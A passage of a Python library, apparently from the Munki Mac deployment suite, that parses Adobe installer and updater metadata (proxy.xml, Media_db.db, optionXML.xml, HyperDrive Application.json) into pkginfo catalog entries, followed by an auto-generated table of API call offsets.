            walked_path, 'Contents', 'Resources', 'ApplyOperation.py')
        if os.path.exists(patch_script):
            return walked_path
    return ''
def get_payload_info(dirpath):
    '''Parses Adobe payloads, pulling out info useful to munki.
    .proxy.xml files are used if available, or for CC-era updates
    which do not contain one, the Media_db.db file, which contains
    identical XML, is instead used.
    CS3/CS4: contain only .proxy.xml
    CS5/CS5.5/CS6: contain both
    CC: contain only Media_db.db

    Returns a dict that may contain AdobeCode, display_name, version and
    installed_size (KB); empty when no payload metadata is found.

    Fixes vs. the original:
    - ``dom`` could be referenced unbound (NameError) when dirpath was a
      directory with no .proxy.xml; now we bail out cleanly, and the
      Media_db.db fallback runs in that case (matching the docstring).
    - the sqlite connection is now always closed.
    - propname was ``.encode('UTF-8')``-ed into bytes, so the comparisons
      against 'AdobeCode' etc. could never match under Python 3.
    '''
    payloadinfo = {}
    dom = None
    if os.path.isdir(dirpath):
        # CS3-CS6 payloads carry a .proxy.xml with the info we need
        proxy_paths = glob(os.path.join(dirpath, '*.proxy.xml'))
        if proxy_paths:
            dom = minidom.parse(proxy_paths[0])
        else:
            # CC-era payloads keep identical XML inside Media_db.db
            db_path = os.path.join(dirpath, 'Media_db.db')
            if os.path.exists(db_path):
                conn = sqlite3.connect(db_path)
                try:
                    cur = conn.cursor()
                    cur.execute("SELECT value FROM PayloadData WHERE "
                                "PayloadData.key = 'PayloadInfo'")
                    result = cur.fetchone()
                    cur.close()
                finally:
                    conn.close()
                if result:
                    dom = minidom.parseString(result[0].encode('UTF-8'))
    if dom is None:
        # no xml, no db, no payload info!
        return payloadinfo
    payload_info = dom.getElementsByTagName('PayloadInfo')
    if payload_info:
        installer_properties = payload_info[0].getElementsByTagName(
            'InstallerProperties')
        if installer_properties:
            for prop in installer_properties[0].getElementsByTagName(
                    'Property'):
                if 'name' not in list(prop.attributes.keys()):
                    continue
                propname = prop.attributes['name'].value
                propvalue = ''
                for node in prop.childNodes:
                    propvalue += node.nodeValue
                if propname == 'AdobeCode':
                    payloadinfo['AdobeCode'] = propvalue
                elif propname == 'ProductName':
                    payloadinfo['display_name'] = propvalue
                elif propname == 'ProductVersion':
                    payloadinfo['version'] = propvalue
        installmetadata = payload_info[0].getElementsByTagName(
            'InstallDestinationMetadata')
        if installmetadata:
            totalsizes = installmetadata[0].getElementsByTagName('TotalSize')
            if totalsizes:
                installsize = ''
                for node in totalsizes[0].childNodes:
                    installsize += node.nodeValue
                # bytes -> KB
                payloadinfo['installed_size'] = int(int(installsize)/1024)
    return payloadinfo
def get_adobe_setup_info(installroot):
    '''Given the root of mounted Adobe DMG,
    look for info about the installer or updater.

    Walks installroot for payloads folders (installer) or an extensions
    folder (updater), collects per-payload info via get_payload_info(),
    and returns a dict that may contain display_name, version,
    AdobeSetupType, payloads and installed_size.'''
    info = {}
    payloads = []
    # look for all the payloads folders
    for (path, dummy_dirs, dummy_files) in os.walk(installroot):
        if path.endswith('/payloads'):
            driverfolder = ''
            media_signature = ''
            setupxml = os.path.join(path, 'setup.xml')
            if os.path.exists(setupxml):
                dom = minidom.parse(setupxml)
                drivers = dom.getElementsByTagName('Driver')
                if drivers:
                    driver = drivers[0]
                    if 'folder' in list(driver.attributes.keys()):
                        # NOTE(review): .encode('UTF-8') yields bytes under
                        # Python 3, so the later `item == driverfolder`
                        # compare would never match there — confirm the
                        # intended runtime.
                        driverfolder = driver.attributes[
                            'folder'].value.encode('UTF-8')
                if driverfolder == '':
                    # look for mediaSignature (CS5 AAMEE install)
                    setup_elements = dom.getElementsByTagName('Setup')
                    if setup_elements:
                        media_signature_elements = setup_elements[
                            0].getElementsByTagName('mediaSignature')
                        if media_signature_elements:
                            element = media_signature_elements[0]
                            for node in element.childNodes:
                                media_signature += node.nodeValue
            # the driver payload (or the payload matching the media
            # signature) supplies the top-level name/version of the product
            for item in osutils.listdir(path):
                payloadpath = os.path.join(path, item)
                payloadinfo = get_payload_info(payloadpath)
                if payloadinfo:
                    payloads.append(payloadinfo)
                    if ((driverfolder and item == driverfolder) or
                            (media_signature and
                             payloadinfo['AdobeCode'] == media_signature)):
                        info['display_name'] = payloadinfo['display_name']
                        info['version'] = payloadinfo['version']
                        info['AdobeSetupType'] = 'ProductInstall'
    if not payloads:
        # look for an extensions folder; almost certainly this is an Updater
        for (path, dummy_dirs, dummy_files) in os.walk(installroot):
            if path.endswith("/extensions"):
                for item in osutils.listdir(path):
                    #skip LanguagePacks
                    if item.find("LanguagePack") == -1:
                        itempath = os.path.join(path, item)
                        payloadinfo = get_payload_info(itempath)
                        if payloadinfo:
                            payloads.append(payloadinfo)
                # we found an extensions dir,
                # so no need to keep walking the install root
                break
    if payloads:
        if len(payloads) == 1:
            info['display_name'] = payloads[0]['display_name']
            info['version'] = payloads[0]['version']
        else:
            # several payloads but no identified driver payload: leave
            # placeholder values for the admin to fill in
            if 'display_name' not in info:
                info['display_name'] = "ADMIN: choose from payloads"
            if 'version' not in info:
                info['version'] = "ADMIN please set me"
        info['payloads'] = payloads
        installed_size = 0
        for payload in payloads:
            installed_size = installed_size + payload.get('installed_size', 0)
        info['installed_size'] = installed_size
    return info
def get_adobe_package_info(installroot):
    '''Gets the package name from the AdobeUberInstaller.xml file;
    other info from the payloads folder.

    Falls back to optionXML.xml (AAMEE/CCP-built packages) for the display
    name, and finally to the basename of installroot.'''
    info = get_adobe_setup_info(installroot)
    info['description'] = ""
    installerxml = os.path.join(installroot, "AdobeUberInstaller.xml")
    if os.path.exists(installerxml):
        description = ''
        dom = minidom.parse(installerxml)
        installinfo = dom.getElementsByTagName("InstallInfo")
        if installinfo:
            packagedescriptions = \
                installinfo[0].getElementsByTagName("PackageDescription")
            if packagedescriptions:
                prop = packagedescriptions[0]
                for node in prop.childNodes:
                    description += node.nodeValue
        if description:
            # convention: "<display name> : <description>"
            description_parts = description.split(' : ', 1)
            info['display_name'] = description_parts[0]
            if len(description_parts) > 1:
                info['description'] = description_parts[1]
            else:
                info['description'] = ""
        return info
    else:
        # no AdobeUberInstaller.xml: try the AAMEE/CCP optionXML.xml instead
        installerxml = os.path.join(installroot, "optionXML.xml")
        if os.path.exists(installerxml):
            dom = minidom.parse(installerxml)
            installinfo = dom.getElementsByTagName("InstallInfo")
            if installinfo:
                pkgname_elems = installinfo[0].getElementsByTagName(
                    "PackageName")
                if pkgname_elems:
                    prop = pkgname_elems[0]
                    pkgname = ""
                    for node in prop.childNodes:
                        pkgname += node.nodeValue
                    info['display_name'] = pkgname
    # last resort: use the folder name itself
    if not info.get('display_name'):
        info['display_name'] = os.path.basename(installroot)
    return info
def get_xml_text_element(dom_node, name):
    '''Returns the text value of the first element named *name* under
    dom_node, or None when no such element exists.'''
    matches = dom_node.getElementsByTagName(name)
    if not matches:
        return None
    return ''.join(node.nodeValue for node in matches[0].childNodes)
def parse_option_xml(option_xml_file):
    '''Parses an optionXML.xml file and pulls the items of interest, returning
    them in a dictionary.

    Returned keys: packager_id, packager_version, package_name, package_id
    and products — a list of dicts where RIBS media carry
    prodName/prodVersion/SAPCode/mediaSignature and HyperDrive media carry
    hd_installer=True plus mediaLEID/prodVersion/productVersion/SAPCode/
    MediaType/TargetFolderName.'''
    info = {}
    dom = minidom.parse(option_xml_file)
    installinfo = dom.getElementsByTagName('InstallInfo')
    if installinfo:
        if 'id' in list(installinfo[0].attributes.keys()):
            info['packager_id'] = installinfo[0].attributes['id'].value
        if 'version' in list(installinfo[0].attributes.keys()):
            info['packager_version'] = installinfo[
                0].attributes['version'].value
        info['package_name'] = get_xml_text_element(
            installinfo[0], 'PackageName')
        info['package_id'] = get_xml_text_element(installinfo[0], 'PackageID')
        info['products'] = []
        # CS5 to CC 2015.0-2015.2 releases use RIBS, and we retrieve a
        # display name, version and 'mediaSignature' for building installs
        # items. SAPCode is also stored so that we can later search by this
        # key across both RIBS and HyperDrive installer metadata.
        medias_elements = installinfo[0].getElementsByTagName('Medias')
        if medias_elements:
            media_elements = medias_elements[0].getElementsByTagName('Media')
            if media_elements:
                for media in media_elements:
                    product = {}
                    product['prodName'] = get_xml_text_element(
                        media, 'prodName')
                    product['prodVersion'] = get_xml_text_element(
                        media, 'prodVersion')
                    product['SAPCode'] = get_xml_text_element(media, 'SAPCode')
                    setup_elements = media.getElementsByTagName('Setup')
                    if setup_elements:
                        media_signature_elements = setup_elements[
                            0].getElementsByTagName('mediaSignature')
                        if media_signature_elements:
                            product['mediaSignature'] = ''
                            element = media_signature_elements[0]
                            for node in element.childNodes:
                                product['mediaSignature'] += node.nodeValue
                    info['products'].append(product)
        # HD (HyperDrive) media for new mid-June 2016 products. We need the
        # SAP codes, versions, and which ones are MediaType 'Product'. Support
        # payloads seem to all be 'STI', and are listed as STIDependencies under
        # the main product.
        hd_medias_elements = installinfo[0].getElementsByTagName('HDMedias')
        if hd_medias_elements:
            hd_media_elements = hd_medias_elements[0].getElementsByTagName(
                'HDMedia')
            if hd_media_elements:
                for hd_media in hd_media_elements:
                    product = {}
                    product['hd_installer'] = True
                    # productVersion is the 'full' version number
                    # prodVersion seems to be the "customer-facing" version for
                    # this update
                    # baseVersion is the first/base version for this standalone
                    # product/channel/LEID,
                    # not really needed here so we don't copy it
                    for elem in [
                            'mediaLEID',
                            'prodVersion',
                            'productVersion',
                            'SAPCode',
                            'MediaType',
                            'TargetFolderName']:
                        product[elem] = get_xml_text_element(hd_media, elem)
                    info['products'].append(product)
    return info
def get_hd_installer_info(hd_payload_root, sap_code):
    '''Attempts to extract some information from a HyperDrive payload
    Application.json file and return a reduced set in a dict.

    hd_payload_root: directory containing one subdirectory per SAP code.
    sap_code: Adobe SAP code naming the payload subdirectory to read.

    Fix: the original read via ``open(...).read()`` and never closed the
    file handle; use a context manager instead.
    '''
    hd_app_info = {}
    app_json_path = os.path.join(hd_payload_root, sap_code, 'Application.json')
    with open(app_json_path, 'r') as fileobj:
        json_info = json.load(fileobj)
    # Copy some useful top-level keys, useful later for:
    # - Name: display_name pkginfo key
    # - ProductVersion: version pkginfo key and uninstall XML location
    # - SAPCode: an uninstallXml for an installs item if it's a 'core' Type
    # - BaseVersion and version: not currently used but may be useful once
    #   there are more HD installers in the future
    for key in ['BaseVersion', 'Name', 'ProductVersion', 'SAPCode', 'version']:
        hd_app_info[key] = json_info[key]
    # Adobe puts an array of dicts in a dict with one key called 'Package'
    hd_app_info['Packages'] = list(json_info['Packages']['Package'])
    return hd_app_info
def get_cs5_media_signature(dirpath):
    '''Returns the CS5 mediaSignature for an AAMEE CS5 install.
    dirpath is typically the root of a mounted dmg; returns '' when no
    payloads folder or signature can be found.'''
    # locate the (last) payloads folder under dirpath
    payloads_dir = ''
    for (walked_path, _dirs, _files) in os.walk(dirpath):
        if walked_path.endswith('/payloads'):
            payloads_dir = walked_path
    if not payloads_dir:
        return ''
    setupxml = os.path.join(payloads_dir, 'Setup.xml')
    if not (os.path.exists(setupxml) and os.path.isfile(setupxml)):
        return ''
    dom = minidom.parse(setupxml)
    setup_elements = dom.getElementsByTagName('Setup')
    if setup_elements:
        signature_elements = setup_elements[0].getElementsByTagName(
            'mediaSignature')
        if signature_elements:
            return ''.join(node.nodeValue
                           for node in signature_elements[0].childNodes)
    return ""
def get_cs5_uninstall_xml(option_xml_file):
    '''Gets the uninstall deployment data from a CS5 installer.

    Returns the concatenated XML text of every
    DeploymentInfo/DeploymentUninstall/Deployment element found in
    option_xml_file, or '' when there is none.

    Fix: Element.toxml('UTF-8') returns bytes under Python 3, so the
    original's ``xml += deployment.toxml('UTF-8')`` raised TypeError there;
    decode to text before accumulating.
    '''
    xml = ''
    dom = minidom.parse(option_xml_file)
    for info_item in dom.getElementsByTagName('DeploymentInfo'):
        deployment_uninstall = info_item.getElementsByTagName(
            'DeploymentUninstall')
        if not deployment_uninstall:
            continue
        deployment_data = deployment_uninstall[0].getElementsByTagName(
            'Deployment')
        if not deployment_data:
            continue
        fragment = deployment_data[0].toxml('UTF-8')
        if isinstance(fragment, bytes):
            fragment = fragment.decode('UTF-8')
        xml += fragment
    return xml
def count_payloads(dirpath):
    '''Attempts to count the payloads in the Adobe installation item.
    Used for rough percent-done progress feedback.'''
    total = 0
    for (walked_path, _dirs, files) in os.walk(dirpath):
        if walked_path.endswith("/payloads"):
            # RIBS-style installers: each payload is a subdirectory
            for entry in osutils.listdir(walked_path):
                if os.path.isdir(os.path.join(walked_path, entry)):
                    total += 1
        elif "/HD/" in walked_path and "Application.json" in files:
            # we're inside an HD installer directory; the payloads/packages
            # are .zip files
            total += len([item for item in files if item.endswith(".zip")])
    return total
def get_adobe_install_info(installdir):
    '''Encapsulates info used by the Adobe Setup/Install app: the CS5 media
    signature, the payload count, and (when optionXML.xml exists) the
    uninstall XML.'''
    install_info = {}
    if not installdir:
        return install_info
    install_info['media_signature'] = get_cs5_media_signature(installdir)
    install_info['payload_count'] = count_payloads(installdir)
    option_xml_file = os.path.join(installdir, "optionXML.xml")
    if os.path.exists(option_xml_file):
        install_info['uninstallxml'] = get_cs5_uninstall_xml(option_xml_file)
    return install_info
# Disable PyLint complaining about 'invalid' camelCase names
# pylint: disable=invalid-name
def getAdobeCatalogInfo(mountpoint, pkgname=""):
    '''Used by makepkginfo to build pkginfo data for Adobe
    installers/updaters.

    Tries each known Adobe installer layout in turn — AAMEE/CCP
    deployment packages, CS5 patch installers, CS4 AdobeUberInstaller
    packages, CS3/updater "Adobe Setup.app" images, and the Acrobat 9
    Pro patcher — and returns a pkginfo-style dict for the first layout
    recognized, or None if nothing matched.

    Args:
        mountpoint: path to the mounted disk image or directory to inspect.
        pkgname: optional package path/name within the mountpoint.

    Returns:
        dict of pkginfo data, or None if no recognized installer found.
    '''
    # look for AdobeDeploymentManager (AAMEE installer)
    deploymentmanager = find_adobe_deployment_manager(mountpoint)
    if deploymentmanager:
        dirpath = os.path.dirname(deploymentmanager)
        option_xml_file = os.path.join(dirpath, 'optionXML.xml')
        option_xml_info = {}
        if os.path.exists(option_xml_file):
            option_xml_info = parse_option_xml(option_xml_file)
        cataloginfo = get_adobe_package_info(dirpath)
        if cataloginfo:
            # add some more data
            if option_xml_info.get('packager_id') == u'CloudPackager':
                # CCP package
                cataloginfo['display_name'] = option_xml_info.get(
                    'package_name', 'unknown')
                cataloginfo['name'] = cataloginfo['display_name'].replace(
                    ' ', '')
                cataloginfo['uninstallable'] = True
                cataloginfo['uninstall_method'] = "AdobeCCPUninstaller"
                cataloginfo['installer_type'] = "AdobeCCPInstaller"
                cataloginfo['minimum_os_version'] = "10.6.8"
                # one media signature per RIBS product listed in optionXML
                mediasignatures = [
                    item['mediaSignature']
                    for item in option_xml_info.get('products', [])
                    if 'mediaSignature' in item]
            else:
                # AAMEE package
                cataloginfo['name'] = cataloginfo['display_name'].replace(
                    ' ', '')
                cataloginfo['uninstallable'] = True
                cataloginfo['uninstall_method'] = "AdobeCS5AAMEEPackage"
                cataloginfo['installer_type'] = "AdobeCS5AAMEEPackage"
                cataloginfo['minimum_os_version'] = "10.5.0"
                cataloginfo['adobe_install_info'] = get_adobe_install_info(
                    installdir=dirpath)
                mediasignature = cataloginfo['adobe_install_info'].get(
                    "media_signature")
                mediasignatures = [mediasignature]
            # Determine whether we have HD media as well in this installer
            hd_metadata_dirs = [
                product['TargetFolderName']
                for product in option_xml_info['products']
                if product.get('hd_installer')]
            hd_app_infos = []
            for sap_code in hd_metadata_dirs:
                hd_app_info = get_hd_installer_info(
                    os.path.join(dirpath, 'HD'), sap_code)
                hd_app_infos.append(hd_app_info)
            # 'installs' array will be populated if we have either RIBS
            # or HD installers, which may be mixed together in one
            # CCP package.
            # Acrobat Pro DC doesn't currently generate any useful installs
            # info if it's part of a CCP package.
            installs = []
            # media signatures are used for RIBS (CS5 to CC mid-2015)
            if mediasignatures:
                # make a default <key>installs</key> array
                uninstalldir = "/Library/Application Support/Adobe/Uninstall"
                for mediasignature in mediasignatures:
                    signaturefile = mediasignature + ".db"
                    filepath = os.path.join(uninstalldir, signaturefile)
                    installitem = {}
                    installitem['path'] = filepath
                    installitem['type'] = 'file'
                    installs.append(installitem)
            # Custom installs items for HD installers seem to need only HDMedias
            # from optionXML.xml with a MediaType of 'Product' and their
            # 'core' packages (e.g. language packs are 'non-core')
            if hd_app_infos:
                if 'payloads' not in cataloginfo:
                    cataloginfo['payloads'] = []
                cataloginfo['payloads'].extend(hd_app_infos)
                # Calculate installed_size by counting packages in payloads
                # in these indexed HD medias. installed_size may exist already
                # if this package contained RIBS payloads, so try reading it
                # and default to 0. This will typically include several very
                # small packages (language or regional recommended settings)
                # which would not actually get installed. These seem to be
                # no larger than a few MB, so in practice it increases the
                # 'installed_size' value by only ~1%.
                installed_size = cataloginfo.get('installed_size', 0)
                for hd_payload in hd_app_infos:
                    for package in hd_payload['Packages']:
                        # Generally, all app installs will include 1-3 'core'
                        # packages and then additional language/settings/color
                        # packages which are regional or language-specific.
                        # If we filter this by including both unconditional
                        # installs and those which are language/region specific,
                        # we get a rough approximation of the total size of
                        # supplemental packages, as their equivalents for other
                        # languages are very close to the same size. We also
                        # get one included language package which would be the
                        # case for any install.
                        #
                        # Because InDesign CC 2017 is not like any other package
                        # and contains a 'Condition' key but as an empty
                        # string, we explicitly test this case as well.
                        if ('Condition' not in list(package.keys()) or
                                package.get('Condition') == '' or
                                '[installLanguage]==en_US' in
                                package.get('Condition', '')):
                            # sizes are in bytes; installed_size is in KB
                            installed_size += int(package.get(
                                'ExtractSize', 0) / 1024)
                            # We get much closer to Adobe's "HDSetup" calculated
                            # install space requirement if we include both the
                            # DownloadSize and ExtractSize data
                            # (DownloadSize is just the zip file size)
                            installed_size += int(package.get(
                                'DownloadSize', 0) / 1024)
                # Add another 300MB for the CC app and plumbing in case they've
                # never been installed on the system
                installed_size += 307200
                cataloginfo['installed_size'] = installed_size
                uninstalldir = (
                    '/Library/Application Support/Adobe/Installers/uninstallXml'
                )
                product_saps = [
                    prod['SAPCode'] for
                    prod in option_xml_info['products']
                    if prod.get('MediaType') == 'Product'
                ]
                product_app_infos = [app for app in hd_app_infos
                                     if app['SAPCode'] in product_saps]
                # if we had only a single HD and no legacy apps, set a sane
                # version and display_name derived from the app's metadata
                if (len(product_app_infos) == 1) and not mediasignatures:
                    cataloginfo.update({
                        'display_name': product_app_infos[0]['Name'],
                        'version': product_app_infos[0]['ProductVersion'],
                    })
                for app_info in product_app_infos:
                    for pkg in app_info['Packages']:
                        # Don't assume 'Type' key always exists. At least the
                        #'AdobeIllustrator20-Settings'
                        # package doesn't have this key set.
                        if pkg.get('Type') == 'core':
                            # We can't use 'ProductVersion' from
                            # Application.json for the part following the
                            # SAPCode, because it's usually too specific and
                            # won't match the "short" product version.
                            # We can take 'prodVersion' from the optionXML.xml
                            # instead.
                            # We filter out any non-HD installers to avoid
                            # matching up the wrong versions for packages that
                            # may contain multiple different major versions of
                            # a given SAPCode
                            pkg_prod_vers = [
                                prod['prodVersion']
                                for prod in option_xml_info['products']
                                if prod.get('hd_installer') and
                                prod['SAPCode'] == app_info['SAPCode']][0]
                            # uninstall marker file name is
                            # SAP_version_pkgname_pkgversion.pimx
                            uninstall_file_name = '_'.join([
                                app_info['SAPCode'],
                                pkg_prod_vers.replace('.', '_'),
                                pkg['PackageName'],
                                pkg['PackageVersion']]) + '.pimx'
                            filepath = os.path.join(
                                uninstalldir, uninstall_file_name)
                            installitem = {}
                            installitem['path'] = filepath
                            installitem['type'] = 'file'
                            installs.append(installitem)
            if installs:
                cataloginfo['installs'] = installs
            return cataloginfo
    # Look for Install.app (Bare metal CS5 install)
    # we don't handle this type, but we'll report it
    # back so makepkginfo can provide an error message
    # installapp = find_install_app(mountpoint)
    # if installapp:
    #     cataloginfo = {}
    #     cataloginfo['installer_type'] = "AdobeCS5Installer"
    #     return cataloginfo
    # Look for AdobePatchInstaller.app (CS5 updater)
    installapp = find_adobepatchinstaller_app(mountpoint)
    if os.path.exists(installapp):
        # this is a CS5 updater disk image
        cataloginfo = get_adobe_package_info(mountpoint)
        if cataloginfo:
            # add some more data
            cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
            cataloginfo['uninstallable'] = False
            cataloginfo['installer_type'] = "AdobeCS5PatchInstaller"
            if pkgname:
                cataloginfo['package_path'] = pkgname
            # make some (hopefully functional) installs items from the payloads
            installs = []
            uninstalldir = "/Library/Application Support/Adobe/Uninstall"
            # first look for a payload with a display_name matching the
            # overall display_name
            for payload in cataloginfo.get('payloads', []):
                if (payload.get('display_name', '') ==
                        cataloginfo['display_name']):
                    if 'AdobeCode' in payload:
                        dbfile = payload['AdobeCode'] + ".db"
                        filepath = os.path.join(uninstalldir, dbfile)
                        installitem = {}
                        installitem['path'] = filepath
                        installitem['type'] = 'file'
                        installs.append(installitem)
                        break
            if installs == []:
                # didn't find a payload with matching name
                # just add all of the non-LangPack payloads
                # to the installs list.
                for payload in cataloginfo.get('payloads', []):
                    if 'AdobeCode' in payload:
                        if ("LangPack" in payload.get("display_name") or
                                "Language Files" in payload.get(
                                    "display_name")):
                            # skip Language Packs
                            continue
                        dbfile = payload['AdobeCode'] + ".db"
                        filepath = os.path.join(uninstalldir, dbfile)
                        installitem = {}
                        installitem['path'] = filepath
                        installitem['type'] = 'file'
                        installs.append(installitem)
            cataloginfo['installs'] = installs
            return cataloginfo
    # Look for AdobeUberInstaller items (CS4 install)
    pkgroot = os.path.join(mountpoint, pkgname)
    adobeinstallxml = os.path.join(pkgroot, "AdobeUberInstaller.xml")
    if os.path.exists(adobeinstallxml):
        # this is a CS4 Enterprise Deployment package
        cataloginfo = get_adobe_package_info(pkgroot)
        if cataloginfo:
            # add some more data
            cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
            cataloginfo['uninstallable'] = True
            cataloginfo['uninstall_method'] = "AdobeUberUninstaller"
            cataloginfo['installer_type'] = "AdobeUberInstaller"
            if pkgname:
                cataloginfo['package_path'] = pkgname
            return cataloginfo
    # maybe this is an Adobe update DMG or CS3 installer
    # look for Adobe Setup.app
    setuppath = find_setup_app(mountpoint)
    if setuppath:
        cataloginfo = get_adobe_setup_info(mountpoint)
        if cataloginfo:
            # add some more data
            cataloginfo['name'] = cataloginfo['display_name'].replace(' ', '')
            cataloginfo['installer_type'] = "AdobeSetup"
            if cataloginfo.get('AdobeSetupType') == "ProductInstall":
                cataloginfo['uninstallable'] = True
                cataloginfo['uninstall_method'] = "AdobeSetup"
            else:
                # not a full product install: treat as an updater
                cataloginfo['description'] = "Adobe updater"
                cataloginfo['uninstallable'] = False
                cataloginfo['update_for'] = ["PleaseEditMe-1.0.0.0.0"]
            return cataloginfo
    # maybe this is an Adobe Acrobat 9 Pro patcher?
    acrobatpatcherapp = find_acrobat_patch_app(mountpoint)
    if acrobatpatcherapp:
        cataloginfo = {}
        cataloginfo['installer_type'] = "AdobeAcrobatUpdater"
        cataloginfo['uninstallable'] = False
        plist = pkgutils.getBundleInfo(acrobatpatcherapp)
        cataloginfo['version'] = pkgutils.getVersionString(plist)
        cataloginfo['name'] = "AcrobatPro9Update"
        cataloginfo['display_name'] = "Adobe Acrobat Pro Update"
        cataloginfo['update_for'] = ["AcrobatPro9"]
        cataloginfo['RestartAction'] = 'RequireLogout'
        cataloginfo['requires'] = []
        cataloginfo['installs'] = [
            {'CFBundleIdentifier': 'com.adobe.Acrobat.Pro',
             'CFBundleName': 'Acrobat',
             'CFBundleShortVersionString': cataloginfo['version'],
             'path': '/Applications/Adobe Acrobat 9 Pro/Adobe Acrobat Pro.app',
             'type': 'application'}
        ]
        return cataloginfo
    # didn't find any Adobe installers/updaters we understand
    return None
# pylint: enable=invalid-name
# Script entry guard: this module is a library and does nothing useful
# when executed directly.
if __name__ == '__main__':
    print('This is a library of support tools for the Munki Suite.')
| [
"os.path.exists",
"xml.dom.minidom.parse",
"sqlite3.connect",
"os.path.join",
"os.path.isfile",
"os.path.dirname",
"xml.dom.minidom.parseString",
"os.path.isdir",
"os.path.basename",
"os.walk"
] | [((1103, 1119), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (1110, 1119), False, 'import os\n'), ((1515, 1531), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (1522, 1531), False, 'import os\n'), ((1953, 1969), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (1960, 1969), False, 'import os\n'), ((2425, 2441), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (2432, 2441), False, 'import os\n'), ((2871, 2887), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (2878, 2887), False, 'import os\n'), ((3632, 3654), 'os.path.isdir', 'os.path.isdir', (['dirpath'], {}), '(dirpath)\n', (3645, 3654), False, 'import os\n'), ((6356, 6376), 'os.walk', 'os.walk', (['installroot'], {}), '(installroot)\n', (6363, 6376), False, 'import os\n'), ((9759, 9810), 'os.path.join', 'os.path.join', (['installroot', '"""AdobeUberInstaller.xml"""'], {}), "(installroot, 'AdobeUberInstaller.xml')\n", (9771, 9810), False, 'import os\n'), ((9818, 9846), 'os.path.exists', 'os.path.exists', (['installerxml'], {}), '(installerxml)\n', (9832, 9846), False, 'import os\n'), ((11917, 11947), 'xml.dom.minidom.parse', 'minidom.parse', (['option_xml_file'], {}), '(option_xml_file)\n', (11930, 11947), False, 'from xml.dom import minidom\n'), ((15704, 15763), 'os.path.join', 'os.path.join', (['hd_payload_root', 'sap_code', '"""Application.json"""'], {}), "(hd_payload_root, sap_code, 'Application.json')\n", (15716, 15763), False, 'import os\n'), ((16818, 16834), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (16825, 16834), False, 'import os\n'), ((17058, 17097), 'os.path.join', 'os.path.join', (['payloads_dir', '"""Setup.xml"""'], {}), "(payloads_dir, 'Setup.xml')\n", (17070, 17097), False, 'import os\n'), ((17837, 17867), 'xml.dom.minidom.parse', 'minidom.parse', (['option_xml_file'], {}), '(option_xml_file)\n', (17850, 17867), False, 'from xml.dom import minidom\n'), ((18621, 18637), 'os.walk', 'os.walk', (['dirpath'], {}), '(dirpath)\n', (18628, 18637), 
False, 'import os\n'), ((30122, 30148), 'os.path.exists', 'os.path.exists', (['installapp'], {}), '(installapp)\n', (30136, 30148), False, 'import os\n'), ((32513, 32546), 'os.path.join', 'os.path.join', (['mountpoint', 'pkgname'], {}), '(mountpoint, pkgname)\n', (32525, 32546), False, 'import os\n'), ((32569, 32616), 'os.path.join', 'os.path.join', (['pkgroot', '"""AdobeUberInstaller.xml"""'], {}), "(pkgroot, 'AdobeUberInstaller.xml')\n", (32581, 32616), False, 'import os\n'), ((32624, 32655), 'os.path.exists', 'os.path.exists', (['adobeinstallxml'], {}), '(adobeinstallxml)\n', (32638, 32655), False, 'import os\n'), ((8321, 8341), 'os.walk', 'os.walk', (['installroot'], {}), '(installroot)\n', (8328, 8341), False, 'import os\n'), ((9887, 9914), 'xml.dom.minidom.parse', 'minidom.parse', (['installerxml'], {}), '(installerxml)\n', (9900, 9914), False, 'from xml.dom import minidom\n'), ((11361, 11390), 'os.path.basename', 'os.path.basename', (['installroot'], {}), '(installroot)\n', (11377, 11390), False, 'import os\n'), ((17105, 17129), 'os.path.exists', 'os.path.exists', (['setupxml'], {}), '(setupxml)\n', (17119, 17129), False, 'import os\n'), ((17134, 17158), 'os.path.isfile', 'os.path.isfile', (['setupxml'], {}), '(setupxml)\n', (17148, 17158), False, 'import os\n'), ((17198, 17221), 'xml.dom.minidom.parse', 'minidom.parse', (['setupxml'], {}), '(setupxml)\n', (17211, 17221), False, 'from xml.dom import minidom\n'), ((19584, 19625), 'os.path.join', 'os.path.join', (['installdir', '"""optionXML.xml"""'], {}), "(installdir, 'optionXML.xml')\n", (19596, 19625), False, 'import os\n'), ((19637, 19668), 'os.path.exists', 'os.path.exists', (['option_xml_file'], {}), '(option_xml_file)\n', (19651, 19668), False, 'import os\n'), ((20202, 20236), 'os.path.dirname', 'os.path.dirname', (['deploymentmanager'], {}), '(deploymentmanager)\n', (20217, 20236), False, 'import os\n'), ((20263, 20301), 'os.path.join', 'os.path.join', (['dirpath', '"""optionXML.xml"""'], {}), 
"(dirpath, 'optionXML.xml')\n", (20275, 20301), False, 'import os\n'), ((20342, 20373), 'os.path.exists', 'os.path.exists', (['option_xml_file'], {}), '(option_xml_file)\n', (20356, 20373), False, 'import os\n'), ((1187, 1237), 'os.path.join', 'os.path.join', (['path', '"""Contents"""', '"""MacOS"""', '"""Install"""'], {}), "(path, 'Contents', 'MacOS', 'Install')\n", (1199, 1237), False, 'import os\n'), ((1253, 1279), 'os.path.exists', 'os.path.exists', (['setup_path'], {}), '(setup_path)\n', (1267, 1279), False, 'import os\n'), ((1597, 1645), 'os.path.join', 'os.path.join', (['path', '"""Contents"""', '"""MacOS"""', '"""Setup"""'], {}), "(path, 'Contents', 'MacOS', 'Setup')\n", (1609, 1645), False, 'import os\n'), ((1661, 1687), 'os.path.exists', 'os.path.exists', (['setup_path'], {}), '(setup_path)\n', (1675, 1687), False, 'import os\n'), ((2049, 2111), 'os.path.join', 'os.path.join', (['path', '"""Contents"""', '"""MacOS"""', '"""AdobePatchInstaller"""'], {}), "(path, 'Contents', 'MacOS', 'AdobePatchInstaller')\n", (2061, 2111), False, 'import os\n'), ((2144, 2170), 'os.path.exists', 'os.path.exists', (['setup_path'], {}), '(setup_path)\n', (2158, 2170), False, 'import os\n'), ((2517, 2561), 'os.path.join', 'os.path.join', (['path', '"""AdobeDeploymentManager"""'], {}), "(path, 'AdobeDeploymentManager')\n", (2529, 2561), False, 'import os\n'), ((2577, 2600), 'os.path.exists', 'os.path.exists', (['dm_path'], {}), '(dm_path)\n', (2591, 2600), False, 'import os\n'), ((3002, 3066), 'os.path.join', 'os.path.join', (['path', '"""Contents"""', '"""Resources"""', 